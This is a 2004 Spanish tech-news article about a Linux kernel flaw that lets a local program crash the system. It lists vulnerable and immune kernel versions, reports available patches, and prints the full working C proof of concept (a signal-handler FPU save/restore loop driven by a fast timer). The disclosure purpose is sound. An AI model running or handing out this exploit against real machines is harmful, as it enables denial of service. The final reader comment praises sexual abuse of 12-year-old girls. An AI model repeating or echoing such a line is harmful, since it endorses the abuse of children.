- Noticias relacionadas
- Otras noticias
Expertos dicen que el software libre garantiza la permanencia de los documentos.jpg)
Software gratuito para gestionar un negocio
Agotadas todas las plazas para el III Congreso de Software Libre
Vivernet Itinerante imparte en Fuenlabrada de los Montes (Badajoz) un curso básico de 'GNULinex'
Firefox podría tener el 50% del mercado de navegadores
Richard Stallman participará en la Conferencia Anual de los Proyectos de la Fundación Wikimedia
Un nuevo software libre facilita el uso del ratón a discapacitados
Hoy se celebra el Día del Software Libre
Microsoft apoya a un sistema operativo de código abierto llamado “Barrelfish”
HP anuncia el lanzamiento de un portátil con Linux
- En el foro
.jpg)
Nuevas versiones de Firefox, KDE y del Kernel Linux-
KERNEL LINUX
Nueva vulnerabilidad en el núcleo de Linux
16 Jun 2004 | REDACCIÓN, LAFLECHA
Se ha comprobado que las siguientes versiones resultan vulnerables, aunque posiblemente lo sean muchas más:
* Linux 2.6.x
2.6.7-rc2
2.6.6 (vanilla)
2.6.6-rc1 SMP (varified by blaise)
2.6.6 SMP (verified by riven)
2.6.5-gentoo (verified by RatiX)
2.6.5-mm6 - (verified by Mariux)
2.6.5 (fedora core 2 vanilla)
2.6.3-13mdk (Mandrake)
* Linux 2.4.2x
2.4.26 vanilla
2.4.26, grsecurity 2.0 config
2.4.26-rc1 vanilla
2.4.26-gentoo-r1
2.4.22
2.4.22-1.2188 Fedora FC1 Kernel
2.4.20 RH7.3 (gcc 2.96)
2.4.18-bf2.4 (debian woody vanilla)
Las siguientes versiones resultan inmunes, aunque se desconoce la razón por el momento:
* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
* Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
* 2.2.19-kernel
El programa para comprobar la vulnerabilidad:#include
#include
#include
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0 " : : "m"(fpubuf));
write(2, "*", 1);__asm__ __volatile__ ("frstor %0 " : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}Más información en Linux Reviews.
Tal y como comenta News.com, los usuarios de Linux se han dado mucha prisa en corregir esa vulnerabilidad en el núcleo de linux. De hecho, durante el día de ayer fueron publicados sendos parches para guardarse de la actuación del exploit que colapsa los sistemas.
El parche para el kernel 2.4.x puede descargarse desde aquí y para el Kernel 2.6.x, aquí.
- Boletín
Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.
- Comentarios
- Publicidad
- Ahora en LaFlecha puedes encontrar Cursos y Másters
Ha salido el nuevo kernel 2.6.7, entre muchas mejoras corrige esta vulnerabilidad.
Un saludo
Lo importante es que apliquen el parche. Por ahora hay buena suerte que la mayoría de usuarios de Linux tienen buenos conocimientos en informática y son disciplinados en este aspecto. Ya será otra historia en un futuro cuando la mayoría de usuarios de Linux no tengan idea de informática y los gusanos hagan fiesta con un sistema operativo sin parches... como sucede hoy con Windows.
"quien no conoce la historia o cree que es inmune a esta, esta condenado a repetirla".
viva la pedofilia a las de 12